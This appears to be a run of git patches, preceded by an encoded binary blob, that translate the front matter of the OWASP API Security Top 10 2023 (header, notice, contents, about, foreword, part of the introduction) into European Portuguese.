zHPA%*LkT)XZF~{T06@WyFJ*rXUtIDS<6CN32+;uZtp1S!0DitL0h*Ek0Ml%SNPXUg zi&WlKquYR=CP4v6bL#|S!pNh~LJK>S)V_qX*v$1iwBC3B-2woFS*M{uUBYnB|NfN* zZv_5dW19NFWyN-Q69fQYr0)u=PTT?%T%&=v9Cisnz_=mrp7WUUrj!#i42+pyub7SHr6+d5osxp({y>Tx z%l12vHETY10RW<)c68w7lO_IjuB4Q|a1a}o3?(H*h=-Dfdp-mT8J3Y78GM5MCniPL ze+!^w@ctw9J}y$e_>3Syeri6>V)Pf5>WhTm0VsKlg=qvB*AF9P32HeHM2PZUVNK%8 zj&76Rj6Sv*kbg=o3g-=4E4=t$PhSa3U;wK#o9Y+=s5EO=Ay+L`p^XH=PZ@TVLHH+` zh7AA!!N0+X^el37CSd(p^qcrP|aG~Jcg=8N9Am;gS-{pgJGH5~x z0peTfk(sl>Se+ZWf;8BBv>Y8&TkAFfyL4X;j2WwR)1REXE~lcEN62&L*J$`3swwBF zo4KGB@+Jrehv98N=rmWfA=X#zfBMab86MWE=I~N*65MKUQ(bB2S9kc2umiUDOLu%9 z`2IkT2LO=TWK2E?R+A}a0{}cCfYR=n_rx=%)>0@5t{9kQjt-gkJHKKi1^{qs$p=O$ 
zxq2rAk6AuyxL875?VI%J`fdS2$-IEJTYK?-{aU@6gy=MKb?3>d$C85xq3vqZh~R8j zb?4h4hur~$X5&nva?f`$L!5aIHx7M|_!*pt_A|V-K??wg(XjywtG-jxS7?i>I|Q%; ze*WQlqB_i+BAYcT@i_|s2xVrlLY(=lZemWJZ4&^p*xivd?(%q-B~8MTKpetln<+3&cx`BCx1m0aU8+pPvj@fy7WKv z@4w3OTK)UOi3^l}SfcrfV9R_*@_peS0gVit@9*A$k{7*Fgu4k~>a!>>$<&;|{mXMF zo&%9jHj1eUsw99%6ujM70V4T1bH(1dB4r#MK&hmiJeb%xeaHHPLQ>m^Px0iib8N}i z$oAo5IF>=ydM)^YINdKB*v&N`MOdj-)PG3(@euLk2=V( zz#L5J*;kg{6?FVYamJ9WwW`E}q41tU+HT?J${Fa?IEVg% zIT;w0pJL+g2vMP!~q zubJ}bjKyS^^}Oe*dp?$m3)#uNvZ7I!c$=WTJFm9vI} zJA8&Fz+ky1wNTCVMTG>*%eF6GA@vH{$|JI|fI>4h&{C3w%*R6bY1UiMQXRW)D3u5N zur@HqOqoCNA9ZKuPTu_oe=a!nq^S=u63@?Xju)YqGKEZ%RMtB*%RsXTX%U3i{N zQTsqZF0Xt}y5d?jbo&Zn^oJ&9F^V?#_}2sn=!*+DHc!2o&1$l+5q*uXT3oz7$20U_ z#&LXUzHQ5AJy#-Oq`Y482}xPEGq5-Yr+AFIujfl7?>uozNiq0U zfbwHMJM5!r1WLhq#>oRCNG#t=mm(7{(!F0VOeS;w_JFe`%>HGB<&Q!Wb2XV=mL#xaWOtSc6VVJtr10`!dF~_5F+Mb_dD}?G zJ7#tHkxpXMw8Qw`{O`b|kKR%~pz!>c^UueIIh+*#(svf9N*-Q`B(==AvdToD7LCk4 zl%B)Q-(_w#eMM&HPMc$E7m*K)&0d3xWB+0w=l{sd+p<|`oqB!jq6*pWn4a(3cqff2 zi`Hr$m`1BD?WSdjoqvf%6QRw@tmgx!(OeCmrBFYTrVNE#M3H^tEv-9h&gpW4WXg;Y7rEOe6-Z3k|CVRJNDUKEc8!6|J=L2@MJqw$9S6RQh1{Q(x=R zmartMgl?-j$u|wt>d30+wcAeIe9{ms=WG02pG#0-0Mt&K4{-{iQjd#&CD5Dut&GD; z{X_l`Yz1-^xE=bTAC-^dikqYw#O2Adqqe^6HJ6reSw-Vs z)5UquamBLE^}b@eH6^dYm+cA#y2?S!ZD?Wcd*p`@MToIMc^7*k>hgxj2s7S?fbh$b#BFR>%wWdpkRdYNr zSZ1)CK#zZG`qS*b%J~eTyU|w7`O&S?t;M&Bx(&Y&gOR(+YnJx|J2*zqkPb(#iN$^= z6VM3zWMBM*%~__3yU=~h<|O@;49IDGY2T`-Zok7{xwaq@Su5r5+Xn6YyIPwz<~`?d zM;pcuhA-$)=~Qla7%5Tfk5psmQv9T%Xl#j7=C)${3#WKd_vFFIv4P*s=6l_jq0Z@Poi)DvPF6li=c#V?XXw!pc<1a5yB9aF7voJlPaZkfGCqp4?KPjR- zcXakys>;ilC4E>e_xu^D`OJrbe*Qr4TquJznXopORGhYzMY@ngbTBv~;QdEjZ$H9i zJEda;#tOn&#)0WJ@_f&-3fqh}cPl+GuF)FN-Y1@YCFWzck! 
z_LJSHI&aHk?#QeUrCC;6Rws$kg>v*KtyUXj14dEj&d5vjDSuU!j?4$G0VPo2%uEoF z52Sr=9VoD3a<=^gF0OkV3e#4wdsrR9`c9&@cGInN@O0mMp7} z4u@raiuAxgPs~;6)2_UfG{2>{-9zhbFg_YPsuA1#mm#AY@wHIH8lCsg`Qc+leHBCR z2bvuSD@@>UYx59Qy3tpV?ks1E#y1DPnC?a1>HE|g4)Pq*jLOCz-MCWULfc&eb?$Ow zVhzg_P(UFWVCgYG_G`;}+x~^A!bpv|DVIrX)PUXt)iD}}zs-!NC4+nWt(#|Cp_j5t z=k!$tQ)HjK^G;^Vc3#64s=cvi7H40}ejp@uUn0&I5zCx~bQ~ZIKd_CHA#M<2Df^`M z?$S8y=Sjk_L{=3UJ#u8xSw-dZQU@g)_LFaJRor`9`Q81apM^S4`37Hs*W{r(#ymp{ z*A@HxaZw6;PhDEx1M#~WEkIAIOrnczyLO3US>?`S#sncB2{5z+xr!eB)FgORnaU+1 zOwkq%rxA`~1L6^CuPppt*`4f*{57BCgjsAD)^J=z6Q3l~_*|Jgs?IR557GtmZd1EYU8*5Rcy&K(0d}dJ^HVp37 z9O7sVV-;M*%O^0`BXxQiChTYM>6=F*Pi1V%J1Lnrxp$>}?yVqP_lJKd>^+xkOOSzB zx<}NmzROxT?8ri!On^mpYlQBpNcjL|D)t@|%YSdt73>P+-SoV-61;~t{%a0*J2T~O zQA4u&urA+dO;F*%{whpmR29JJ$Kkd=;WGNMuR&)`9X-d_x~XX|rC5q-ILJo@qjnJP za_%-Soq#3?S3ge>zmxZnEcHs#S%`2knJws73>5{2O66{Uo8M57hI^N6#A7R=3aD;`vO!}sg)@cG8C@n4u2 zviio6Yc-5c3rLbgcgmz^V(mtn*KFdwg(R3keoM??g|T&`Ov1zy{aVSksUY83v(m;i z)kGUg^x8zz9x*2Y1Dq*Z+v#&bVnJLj3mji$muj-5NgtmVP-$_J?V9(^C_g#Bv8A@- z{>tfdNt=7oXo`lgodYGO_6$L~-!o#>ZeGJ_f_$c0oLV(ZeP+!9xo3MX!3{=v{+pMY zO)@7Qulm@@lh=s-Fx}|&unDOG6{@D*%m2JBG0*FKN;L!;YbVu^HFsy@Mc~JekUVY1 zNR9xeIXBM;HXzs->o`qgR?_NyE=+@R*45&VC|AirE%hF8{=aN` z>Khy9!G{gs zTZOwGxONFN^O(=W>u(7vaEVi{A^NmnSqCrpYkb&>U-S>Vn_+BuOf!udE?3zVi%VA7 z6&{llRseg`cfbE?iV6U8#g&~tt0eC79^#(W(05rHE*NL;)a0EdsCJ@Hr(S#4g!?Rh zEjw0z)K%CmQI!qR7?$uW7Q2J-y@@;C6@DLl`Bt*zmkqs_V2vb^%*63#l9i`Wg*SDuohO_2<8;Le*rdM2@`P3N%(v>Ad#9gsQlATX_BF zE%DpZkX$!nN!tksFW^}3OU>O-?iZ5RDrz16;vyGqMOhJPvhZnuoqW^}&$}_VuMl8? 
zgeClK9e?%U5Z!-PakNDBFr>JGdosMm%NVSGA0n-D{CLaTjf#-cgc3tWs`CYaOYnO_1#j@a$0gt^qJ;Wb(p-rPD5mg6`uuN+l5gSjNqOiUdouER+zo8MA z$2G@Yni_8tuu=NXk!t2uN^yo{F;?P?$db-kiC-X@JeytWCEVn6=Tkp1?Z zDNu$I4l!z*p605rl8_(QJOS&=FKau=eTYuTm0U*_aR`ZxYwE*gP7|c)q48V(bT=U+ zgXa5qy*a4;rYP_`547u8lB-NeD~q|e(E3)5TXJqWicEl0>r0}`jyOR-vtR1XR=WR> z;X%hG-r4RoNe*L9F=DniK|jT>{0+#9hBMy}}#RpvuBUQal*9ZH4}Q`lf2fOxs7eeB$&p6tasQn8Ax{OIyo1KN`<=L|ACRmB&0WQa-rfVS8bQX?Vq0 zSmjW8;OSvEneTZfqcv3R)g78tm7V1z*dF`3b6oZD8Q)%-74JB?dSBr(qOi0jqkCVW zC#Y!tV@b3l$HskevRWHq>BB3ERwnq~K4irFI?79e`Tq*nw!43V0f*akzDTqBQzbLz z(2R?13E#ulr{=|V{ab(0G$7CJQr&GWeHe^&yi4YRkvc4doSeNobd=pv@V;^Z$4Gbu zE$Q!c&GD=ua#8~v4dU)lgm`hfTQFn3)cJ=}5bB163XL+FuLH6^m<)2tg+ATUIyL|8 zjnPtvf0nDRVLn=UU&<`GJj+QJZPiz(GQVWy#vN2E8s{+2!;_x+JC8Ak(W@hYZMI(D zVw`E)L3lpkqZx3(D)46i>*2z#@>0i{?LeiOg|4^liN`m(<)Laf{h2 z{=!Hm^}B>bD$v<Q@BKMPOvCk9mQ zbWo0~v&dRs6xc$o=QE?A93$JPBO8j1$bZ{bQMx{+XAncKFwMEu9Rr= zqgx;fzh(pFgfgG(J;g=OZNU!ivptAbV2swD)t6+4D z(?=dK*stTOT5s05T|T`?6_Dyf$2c>p_B>bYIp+r-c^)XKA6D|oL{?WsAw$k^`0zRe2 z*?oE6+DrJS{!RQk4qk0{XG`EP_rzdVLK{hJH|hv4M-vi*v8@GDAe-;Q#4r>LWi-6? 
zv{$3Z%w2j9Awj5QpJ}Xo19b*E$Sbg!CL?_lMbtHrP}$-3IL`j`NbX zNF|xv97dmbu7Lx$vOF=3q=fr5&kPrmD=*0duaT6;{+UU|nM z7`Nuxv_`URc~t*$vNOar+UQ(bY+%*`L#P7zsAa@Q(l)K#c&_VCKLjS5^_zn%gjJRO zJ$rv{s&b%T^(|QjWwP5qnQ+`=F)elmHK(1C9LlB)C|W1P&3nfU6I^pUJ9b6EuP=Kq zo`v(YG?kM!8cm~|$dzf)?BeE7L#e7&EsBt`mw?T4xiQ#D$y$+goBYZu1wgplsGLx_!g~;zWfieXr1+KOo@Y@i1 z+_Tbur?VU&UIt3IYB@?#_#Fg7HpoYR9QK~?OK>v)nZkFPI%o@$79J$;WNsjfrF zb46Rv&HjhLHp_Sm;+R`?vUpA)_^on=8)QiW3;R{Hh^#HV@bm|*a*GM+#AqWuDcTPcK>}WDKx6c=?g3LoI#@jUR9RHUwmG*Mtj)iqxtki6n;kPH@ z6m9E953|9Q753pQensprHj|0fTe2#@cMEJ-r)A0OmC zee-RXO{29h389IID+p&WPQ| z+v2l0b_0TmN=DCzJsB=F+*2bS?z}pn zBD^E0FozO3Tib}6;nU9Hxr56^{(GI##G01n$n97ot3KfL8~c~N{Y#BVvRG5QVjP`o ztJ{4Zuw@#~XGYU7r9!)o-fC;9XZ9qPJKIq}KKQsoC;efSOgk;mjkQ@E@>8E|wEuji zXw}6F*D?`gv1(-yLc)O=8?#M3H04=p-4Nm7xjiRMH4Mb8NT3Fec%8kujAVCo#F8ta zCdRzI_GDTtoeIxf8D1a-B!SsmmB$VlOL&7H*fA|8qMn0n_1`Zl6(H9<3x-fP>$tdk zETr)aFqYkkt7h}-{g|d%7kMr4udaZV?R9TVWJz-rE&kvGeXpG|z0qW6`ZV3cS<4z| zVSW1^`L}CD!O};X->P&ZAEG-Z7o?)*mv?SuWf)OGFyQcDyQZ9-#%?>SXcF21%YVD~ zj>Vg)6iHliRdc?>7^X}&ME*=#yEUG-(!pyw7Z3PmS-yERvK>DF;vaX1^|HXQb$mo7*Gj!}90xe^ZEB_~-t@zPUSrj>IpXvjm3zuo~}&)H}&-|J9)x zz0@T6Z*X?12^xkI3wKsRoR8hnTi4B6M-+3!A&MPzv2Dn*A?xvSTxo3Y*Z2APkdg2* zc43P<;R;bKp(?EZ3Lxk+TD!2{^T9xll7e++nc9ws#=$C!)8jwBI6d;I(1PeTS<9~t zQa*BE{){YD_O)Z*|0<^ zc5XJckAflIsfQ8Nhhq5qVME{2A@^-jWUX8EO#;f0nLlX(S*4F)1@5K6R}pX*#fl6h z^Oml`=tHNe?8aliyp$aWU9B%8t&Awi(~1Vl0o%h~r>XLRebkb8fs^Gke&>1}goUuS>6Uu%l|S5vS+Y{k)rEiChcS^u$R z_NLqV);MYzja_EGbi6FMicu)u8HM1j@vQha)<~fZYs_^**+Z9gbg$&kvG;!U19?Yy zuZKWDD62vZbaINSr@d~=;b>#;eaz)_nH%yt)DSxY(b}w7CMST3KXkGHs#?pJEIOq^hZ=jlYQ6cg~1PgEh$HGGX?o^ zVFD(qc5VRz_ooiAd~KH(VO$CB8_`FXt^cqKDXNeJ-Q{pEID9>~m9x96ac= z);@+~XjgF}YU8UesSJn$&^wU0A#Kjm)UB^MICH z%_M+WHx##^TV+SE=HShspqB(K>h2t-@91KtS#S-kqCcT`e!h9)FcPBCdA*l*>A92B zHji%|*=+6=PEB~xqUm2>UVAr$641Q}JKQ4J;*qqH1zuj^kRw-(1fae_QwV-uyJ?gu z_We9B03dWxLP~44WhbC~9b)dc=6V_J&<|h+q2JSsThx#xoUNMkZE`j+|1&Esi9lPQ4LRm7>wLl!`uxL{CdyI$DT9eyQ# zxp#;1l4-f3p8K{4ow{TmnGEO-pkQT+5Qd!^UQFawPVfi;3L#oo%b9!v&YbK~ZJvUq 
zLo2z9et<{p8nk@*XE^LjPocw0Ji{dv4r|p2c^yeA&}Zl>or0b&E@KX+>&60}u>@;J zl3Fs;9;S2}!;kAgX!HC@i4#z)5PS8HgI9`2_CzTiv(hOe4x1hei-ZsQF?rU>oR_hT zI~P2YCp#f)2x#y~j2cs0_o4>A!tP^5u?}yhJPBaBAotd_TIW`YN=O+PyIfhLoPtN5AQ;MaU`MDGNo`X6m2t>(Lh(9&rkye{=zYAAWvuLObpQaU ztmzR_4Y~X=8-8^-oPjr_<&(*gh}Rw?<3zRDYZjO}xJv;Z$#kk%>lZ$sY9hXbv09%o z5R_UU&h?oE@GjY6N3{wV9gcy3s1Y55157GS_*MMoq~pd0|B37Stmi2N1M>!6EHYxyTp(f+oaz~<;`otXdlZIybYipkFEZ!X)72Xw4f;;&3kxK;;mY;%^NBWk}Kee>RW zRiVnuI_}p(5RvcA(OJkfm&_xDRg}zwS|2%)05H7n6v(p9<0}Sd_2!gxvw;8hUyP-d z#GdS1IB7@UFqM`MHVB{Z4^5p>>Sj*7(hoo!yt?d;vtgezp86~c3lLZyMDk$h)qGP` z%E|tYXKcu$CGE;i{R$e%j-a7te}eBs%up+x6^%lu!d1}Qho_snYXou)6Eq)UrHPzU ztac<2WzexQ`$NcDg0p}N#X)45qFe!ibpxmKy}Lk7(C~<8IbU}@kZ`6nVS1Z{z|Sb> zASn44-~7rFZ=k+gHgVa2NQr+30KCPJLylz0{t?dJ7v)pAB{2&V)a!o2d)QBk+7A-Y znvOs^PARM@0neVJi%5@?_%?PidXm+?eM^!zQ1Sd*YJ{XHQJ5xzegVlA2=u6Ew@BTG z$<{*hXDQw{8kF6+w@CT6?-9fvV}_YwGAYM;y^%@(V{%!~uD+R{O2KiyC)C4(!)HrY zug|-u9FOoTSCmB=28E>ut{ Date: Sat, 16 Dec 2023 23:07:55 +0000 Subject: [PATCH 02/64] 0x00-header.md --- editions/2023/pt-pt/0x00-header.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/editions/2023/pt-pt/0x00-header.md b/editions/2023/pt-pt/0x00-header.md index d3936a8b2..2b26af67e 100644 --- a/editions/2023/pt-pt/0x00-header.md +++ b/editions/2023/pt-pt/0x00-header.md @@ -1,13 +1,13 @@ --- title: '' -description: OWASP API Security Top 10 2023 edition +description: OWASP API Security Top 10 2023 --- ![OWASP LOGO](images/cover.jpg) | | | | | - | - | - | -| https://owasp.org | This work is licensed under a [Creative Commons Attribution-ShareAlike 4.0 International License][1] | ![Creative Commons License Logo](images/front-cc.png) | +| https://owasp.org | Distribuído ao abrigo da licença [Creative Commons Attribution-ShareAlike 4.0 International License][1] | ![Creative Commons License Logo](images/front-cc.png) | [1]: http://creativecommons.org/licenses/by-sa/4.0/ From 6b62091d937cf463181efb84d0fddc2d2a905489 Mon Sep 17 00:00:00 2001 
From: Rui Silva <11950757+RiuSalvi@users.noreply.github.com>
Date: Sat, 16 Dec 2023 23:20:13 +0000
Subject: [PATCH 03/64] 0x00-notice.md
---
 editions/2023/pt-pt/0x00-notice.md | 11 +++++------
 1 file changed, 5 insertions(+), 6 deletions(-)
diff --git a/editions/2023/pt-pt/0x00-notice.md b/editions/2023/pt-pt/0x00-notice.md
index c40368695..275675afc 100644
--- a/editions/2023/pt-pt/0x00-notice.md
+++ b/editions/2023/pt-pt/0x00-notice.md
@@ -1,11 +1,10 @@
-# Notice
+# Nota
 
-This is the text version of OWASP API Security Top 10, used as source for any
-official versions of this document such the web site.
+Esta é a versão de texto do OWASP API Security Top 10, usada como fonte para quaisquer versões oficiais deste documento como por exemplo o website.
 
-Contributions to the project such as comments, corrections, or translations
-should be done here. For details on [How To Contribute][1], please refer to
-[CONTRIBUTING.md][1].
+Contribuições para o projeto tais como comentários, correções ou traduções devem
+ser feitas aqui. Para mais detalhes sobre [Como Contribuir][1], por favor
+consulte a secção [CONTRIBUTING.md][1].
 
 * Erez Yallon
 * Inon Shkedy
From 84df457acb37604b75ea7907dd7c9b10fb7a8bac Mon Sep 17 00:00:00 2001
From: Rui Silva <11950757+RiuSalvi@users.noreply.github.com>
Date: Sat, 16 Dec 2023 23:31:35 +0000
Subject: [PATCH 04/64] 0x00-toc.md
---
 editions/2023/pt-pt/0x00-toc.md | 22 +++++++++++-----------
 1 file changed, 11 insertions(+), 11 deletions(-)
diff --git a/editions/2023/pt-pt/0x00-toc.md b/editions/2023/pt-pt/0x00-toc.md
index ca93bd5ba..0805d5232 100644
--- a/editions/2023/pt-pt/0x00-toc.md
+++ b/editions/2023/pt-pt/0x00-toc.md
@@ -1,11 +1,11 @@
-# Table of Contents
+# Tabela de Conteúdos
 
-* [Table of Contents](0x00-toc.md)
-* [About OWASP](0x01-about-owasp.md)
-* [Foreword](0x02-foreword.md)
-* [Introduction](0x03-introduction.md)
-* [Release Notes](0x04-release-notes.md)
-* [API Security Risks](0x10-api-security-risks.md)
+* [Tabela de Conteúdos](0x00-toc.md)
+* [Sobre a OWASP](0x01-about-owasp.md)
+* [Prefácio](0x02-foreword.md)
+* [Introdução](0x03-introduction.md)
+* [Notas da Versão](0x04-release-notes.md)
+* [Riscos de Segurança em APIs](0x10-api-security-risks.md)
 * [OWASP Top 10 API Security Risks – 2023](0x11-t10.md)
 * [API1:2023 Broken Object Level Authorization](0xa1-broken-object-level-authorization.md)
 * [API2:2023 Broken Authentication](0xa2-broken-authentication.md)
@@ -17,7 +17,7 @@
 * [API8:2023 Security Misconfiguration](0xa8-security-misconfiguration.md)
 * [API9:2023 Improper Inventory Management](0xa9-improper-inventory-management.md)
 * [API10:2023 Unsafe Consumption of APIs](0xaa-unsafe-consumption-of-apis.md)
-* [What's Next For Developers](0xb0-next-devs.md)
-* [What's Next For DevSecOps](0xb1-next-devsecops.md)
-* [Methodology and Data](0xd0-about-data.md)
-* [Acknowledgments](0xd1-acknowledgments.md)
+* [O Que Se Segue Para Programadores](0xb0-next-devs.md)
+* [O que Se Segue Para DevSecOps](0xb1-next-devsecops.md)
+* [Metodologia e Dados](0xd0-about-data.md)
+* [Agradecimentos](0xd1-acknowledgments.md)
From c96d06da7f4412e843a0427393cb4af9163e1207 Mon Sep 17 00:00:00 2001
From: Rui Silva <11950757+RiuSalvi@users.noreply.github.com>
Date: Sun, 17 Dec 2023 11:37:41 +0000
Subject: [PATCH 05/64] 0x00-about-owasp.md
---
 editions/2023/pt-pt/0x01-about-owasp.md | 73 +++++++++++++------------
 1 file changed, 38 insertions(+), 35 deletions(-)
diff --git a/editions/2023/pt-pt/0x01-about-owasp.md b/editions/2023/pt-pt/0x01-about-owasp.md
index 1a7e05126..5027f41dd 100644
--- a/editions/2023/pt-pt/0x01-about-owasp.md
+++ b/editions/2023/pt-pt/0x01-about-owasp.md
@@ -1,53 +1,56 @@
-# About OWASP
+# Sobre a OWASP
 
-The Open Worldwide Application Security Project (OWASP) is an open community
-dedicated to enabling organizations to develop, purchase, and maintain
-applications and APIs that can be trusted.
+Open Worldwide Application Security Project (OWASP) é uma comunidade aberta que
+se dedica a ajudar as organizações a desenvolver, adquirir e manter aplicações e
+APIs confiáveis.
 
-At OWASP, you'll find free and open:
+A OWASP disponibiliza de forma livre e aberta:
 
-* Application security tools and standards.
-* Complete books on application security testing, secure code development, and
- secure code review.
-* Presentations and [videos][1].
-* [Cheat sheets][2] on many common topics.
-* Standard security controls and libraries.
-* [Local chapters worldwide][3].
-* Cutting edge research.
-* Extensive [conferences worldwide][4].
-* [Mailing lists][5] ([archive][6]).
+* Ferramentas e normas de segurança aplicacional.
+* Livros completos sobre testes de segurança aplicacional, desenvolvimento
+ de código seguro e revisão de código focada em segurança.
+* Apresentações e [vídeos][1].
+* [_Cheat Sheets_][2] sobre assuntos diversos.
+* Controlos e bibliotecas de segurança _standard_.
+* [Comunidades locais espalhadas por todo o mundo][3].
+* Investigação de ponta.
+* Múltiplas [conferências em todo o mundo][4].
+* [Listas de discussão][5] ([arquivo][6]).
 
-Learn more at: [https://www.owasp.org][7].
+Mais informação em: [https://www.owasp.org][7].
 
-All OWASP tools, documents, videos, presentations, and chapters are free and
-open to anyone interested in improving application security.
+Todas as ferramentas, documentos, vídeos, apresentações e comunidades locais da
+OWASP são livres e abertos a todos os interessados em melhorar a segurança
+aplicacional.
 
-We advocate approaching application security as a people, process, and
-technology problem, because the most effective approaches to application
-security require improvements in these areas.
+Aconselhamos uma abordagem à segurança aplicacional como sendo um problema de
+pessoas, processos e tecnologia, porque as abordagens mais eficazes à segurança
+aplicacional necessitam de melhorias em todas estas áreas.
 
-OWASP is a new kind of organization. Our freedom from commercial pressures
-allows us to provide unbiased, practical, and cost-effective information about
-application security.
+A OWASP é um novo tipo de organização. A nossa independência em relação a
+pressões comerciais permite-nos fornecer informação imparcial, prática e
+economicamente adequada sobre a segurança aplicacional.
 
-OWASP is not affiliated with any technology company, although we support the
-informed use of commercial security technology. OWASP produces many types of
-materials in a collaborative, transparent, and open way.
+A OWASP não está afiliada com nenhuma empresa tecnológica, embora suportemos o
+uso informado de tecnologias de segurança comerciais. A OWASP produz muitos
+tipos de materiais de uma forma colaborativa, transparente e aberta.
 
-The OWASP Foundation is the non-profit entity that ensures the project's
-long-term success. Almost everyone associated with OWASP is a volunteer,
-including the OWASP board, chapter leaders, project leaders, and project
-members. We support innovative security research with grants and infrastructure.
+A fundação OWASP é uma entidade sem fins lucrativos o que assegura o sucesso a
+longo prazo do projeto. Quase todas as pessoas associadas à OWASP são
+voluntárias, incluindo a direção da OWASP, os líderes das comunidades locais, os
+líderes dos projetos e os seus membros. Suportamos investigação inovadora em
+segurança através de bolsas e infraestrutura.
 
-Come join us!
+Junte-se a nós!
 
 ## Copyright and License
 
 ![license](images/license.png)
 
-Copyright © 2003-2023 The OWASP Foundation. This document is released under the
-[Creative Commons Attribution Share-Alike 4.0 license][8]. For any reuse or
-distribution, you must make it clear to others the license terms of this work.
+Copyright © 2003-2023 The OWASP Foundation. Este documento é distribuído de
+acordo com a licença [Creative Commons Attribution Share-Alike 4.0 license][8].
+Para qualquer tipo de reutilização ou distribuição, deve deixar claro para
+terceiros os termos da licença deste trabalho.
 
 [1]: https://www.youtube.com/user/OWASPGLOBAL
 [2]: https://cheatsheetseries.owasp.org/
From c34ae88aadf6ab4e00812e1db515f8ab9db008a1 Mon Sep 17 00:00:00 2001
From: Rui Silva <11950757+RiuSalvi@users.noreply.github.com>
Date: Sun, 17 Dec 2023 16:56:16 +0000
Subject: [PATCH 06/64] 0x02-foreword.md
---
 editions/2023/pt-pt/0x02-foreword.md | 64 +++++++++++++++-------------
 1 file changed, 34 insertions(+), 30 deletions(-)
diff --git a/editions/2023/pt-pt/0x02-foreword.md b/editions/2023/pt-pt/0x02-foreword.md
index 944acfc82..500ff338f 100644
--- a/editions/2023/pt-pt/0x02-foreword.md
+++ b/editions/2023/pt-pt/0x02-foreword.md
@@ -1,41 +1,45 @@
-# Foreword
-
-A foundational element of innovation in today's app-driven world is the
-Application Programming Interface (API). From banks, retail, and transportation
-to IoT, autonomous vehicles, and smart cities, APIs are a critical part of
-modern mobile, SaaS, and web applications and can be found in customer-facing,
-partner-facing, and internal applications.
-
-By nature, APIs expose application logic and sensitive data such as Personally
-Identifiable Information (PII) and because of this, APIs have increasingly
-become a target for attackers. Without secure APIs, rapid innovation would be
-impossible.
-
-Although a broader web application security risks Top 10 still makes sense, due
-to their particular nature, an API-specific security risks list is required.
-API security focuses on strategies and solutions to understand and mitigate the
-unique vulnerabilities and security risks associated with APIs.
-
-If you're familiar with the [OWASP Top 10 Project][1], then you'll notice the
-similarities between both documents: they are intended for readability and
-adoption. If you're new to the OWASP Top 10 series, you may be better off
-reading the [API Security Risks][2] and [Methodology and Data][3] sections
-before jumping into the Top 10 list.
-
-You can contribute to OWASP API Security Top 10 with your questions, comments,
-and ideas at our GitHub project repository:
+# Prefácio
+
+As APIs - _Application Programming Interface_ têm um papel fundamental na
+inovação que observamos nos dias de hoje ao nível das aplicações. Desde a banca,
+retalho e transportes à Internet das Coisas (IoT), veículos autónomos e _Smart
+Cities_, as APIs são hoje um elemento crítico nas aplicações móveis, _Software
+as a Service_ (SaaS) e aplicações web, sejam elas destinadas ao público em
+geral, parceiros de negócio ou para uso interno das organizações.
+
+Por definição as APIs expõem lógica aplicacional e dados sensíveis tais como
+informação pessoal (PII - _Personally Identifiable Information_), motivo pelo
+qual se têm vindo a tornar um alvo para os atacantes. Se não conseguirmos
+garantir a segurança das APIs será impossível continuar a inovar a um ritmo
+acelerado.
+
+Apesar de continuar a fazer sentindo manter uma lista dos 10 principais
+problemas de segurança em aplicações web, devido à natureza particular das APIs,
+é importante haver também uma tal lista específica para APIs.
+A segurança das APIs foca-se nas estratégias e soluções para compreender e
+mitigar as vulnerabilidades e risco de segurança associado às APIs.
+
+Se estiver familiarizado com o projeto [OWASP Top 10][1] com certeza notará as
+semelhanças entre os documentos: elas são propositadas para facilitar a leitura
+e adoção deste. Se por outro lado for a primeira vez que tem contacto com um
+documento da série OWASP Top 10, sugerimos que comece por ler as secções [Riscos
+de Segurança em APIs][2] e [Metodologia e Dados][3] antes de aprofundar a lista
+dos dez problemas de segurança mais críticos em APIs.
+
+Pode contribuir para o OWASP API Security Top 10 com perguntas, comentários e
+ideias no repositório do projeto no GitHub:
 
 * https://owasp.org/www-project-api-security/
 * https://github.com/OWASP/API-Security/blob/master/CONTRIBUTING.md
 
-You can find the OWASP API Security Top 10 here:
+Pode ainda encontrar o OWASP API Security Top 10 em:
 
 * https://owasp.org/www-project-api-security/
 * https://github.com/OWASP/API-Security
 
-We wish to thank all the contributors who made this project possible with their
-effort and contributions. They are all listed in the [Acknowledgments
-section][4]. Thank you!
+Gostaríamos de agradecer a todos os que participaram neste projeto, tornando-o
+possível com o seu empenho e contribuições. A lista de contribuidores
+encontra-se na secção [Agradecimentos][4]. Obrigado!
 
 [1]: https://owasp.org/www-project-top-ten/
 [2]: ./0x10-api-security-risks.md
From 6c68031a474253e6310bba88674093856e1dc307 Mon Sep 17 00:00:00 2001
From: Rui Silva <11950757+RiuSalvi@users.noreply.github.com>
Date: Sun, 17 Dec 2023 19:03:08 +0000
Subject: [PATCH 07/64] 0x03-introduction.md

---
 editions/2023/pt-pt/0x03-introduction.md | 49 ++++++++++++------------
 1 file changed, 24 insertions(+), 25 deletions(-)

diff --git a/editions/2023/pt-pt/0x03-introduction.md b/editions/2023/pt-pt/0x03-introduction.md
index 752492b1f..1e2a15929 100644
--- a/editions/2023/pt-pt/0x03-introduction.md
+++ b/editions/2023/pt-pt/0x03-introduction.md
@@ -1,26 +1,26 @@
-# Introduction
+# Introdução
 
-## Welcome to the OWASP API Security Top 10 - 2023!
+## Bem-vindo ao OWASP API Security Top 10 - 2023!
 
-Welcome to the second edition of the OWASP API Security Top 10!
+Bem-vindo à segunda edição do OWASP API Security Top 10!
 
-This awareness document was first published back in 2019. Since then, the API
-Security industry has flourished and become more mature. We strongly believe
-this work has positively contributed to it, due to it being quickly adopted as
-an industry reference.
+Este documento de consciencialização foi publicado pela primeira vez em 2019.
+Desde então, a indústria de segurança das APIs cresceu e ganhou maturidade. Nós
+acreditamos fortemente que este trabalho contribuiu positivamente para tal,
+devido a ter sido adotado rapidamente como referência na indústria.
 
-APIs play a very important role in modern application architecture. But since
-innovation has a different pace than creating security awareness, we believe
-it's important to focus on creating awareness for common API security
-weaknesses.
+As APIs desempenham um papel muito importante na arquitetura das aplicações
+modernas. Devido à inovação ter um ritmo diferente do que a sensibilização
+para a segurança, nós acreditamos que é importante concentrarmo-nos nas
+falhas de segurança mais comuns das APIs.
 
-The primary goal of the OWASP API Security Top 10 is to educate those involved
-in API development and maintenance, for example, developers, designers,
-architects, managers, or organizations. You can know more about the API Security
-Project visiting [the project page][1].
+O objetivo principal do OWASP API Security Top 10 é educar todos aqueles
+envolvidos no desenvolvimento e manutenção de APIs, como por exemplo,
+programadores, _designers_, arquitetos, gestores ou organizações. Pode saber
+mais sobre o projeto API Security visitando a [página do projeto][1].
 
-If you're not familiar with the OWASP top 10 series, we recommend checking at
-least the following top 10 projects:
+Se não estiver familiarizado com a série OWASP Top 10, nós recomendamos que veja
+pelo menos os seguintes projetos Top 10:
 
 * [OWASP Cloud-Native Application Security Top 10][2]
